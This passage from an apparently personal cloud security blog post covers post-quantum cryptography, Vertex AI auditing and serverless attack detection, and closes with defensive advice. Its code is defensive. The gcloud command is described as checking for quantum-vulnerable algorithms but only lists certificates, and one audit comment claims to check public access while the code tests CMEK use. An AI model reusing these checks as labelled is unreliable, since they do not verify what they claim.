# Implementation will depend on your specific environment
return metrics
Future Cloud Security Trends
As I look to the future of cloud security, these are the areas I'm focusing on:
Quantum-Resistant Cryptography in the Cloud
With quantum computing advancing rapidly, cryptographic vulnerabilities loom:
# Check for quantum-vulnerable algorithms in GCP SSL certificates
gcloud compute ssl-certificates list --format="table(name,type,creationTimestamp,managed.status)"
GCP, AWS, and Azure are all introducing post-quantum cryptography options, but it's crucial to proactively identify and replace vulnerable implementations.
AI/ML Security in Cloud Platforms
Machine learning workflows introduce unique security challenges:
- Model poisoning through manipulated training data
- Inference attacks extracting sensitive information
- API-based model extraction stealing intellectual property
For GCP AI Platform security, I recommend:
from google.cloud import aiplatform_v1
def audit_vertex_ai_security(project_id, location):
client = aiplatform_v1.ModelServiceClient()
# List all models
parent = f"projects/{project_id}/locations/{location}"
models = client.list_models(request={"parent": parent})
for model in models:
# Check for public access
if model.encryption_spec.kms_key_name == "":
print(f"WARNING: Model {model.display_name} is not using CMEK")
# Check for vulnerable container images
if "latest" in model.container_spec.image_uri:
print(f"WARNING: Model {model.display_name} uses 'latest' tag for container image")
Serverless-to-Serverless Attacks
The emerging trend of serverless-to-serverless attacks requires new detection approaches:
def detect_serverless_chain_attacks(project_id):
# Implementation would involve analyzing Cloud Function invocation patterns,
# identifying unusual service account usage, and detecting abnormal data access
pass
Key Takeaways and Defensive Strategy
After years of penetration testing cloud environments, here's my strategic advice:
- Implement guardrails, not gates: Use organization policies and service control policies to enforce security standards without hindering innovation
- Automate everything: Manual security processes cannot scale with cloud adoption
- Focus on identity first: Identity is the primary security perimeter in modern cloud environments
- Prioritize visibility: You can't secure what you can't see, comprehensive asset inventory is essential
- Shift left: Integrate security into development pipelines rather than bolting it on afterward
Remember: in cloud security, what you don't know absolutely will hurt you. Stay curious, keep learning, and always assume there's another misconfiguration waiting to be found.
Until next time,
Rasoul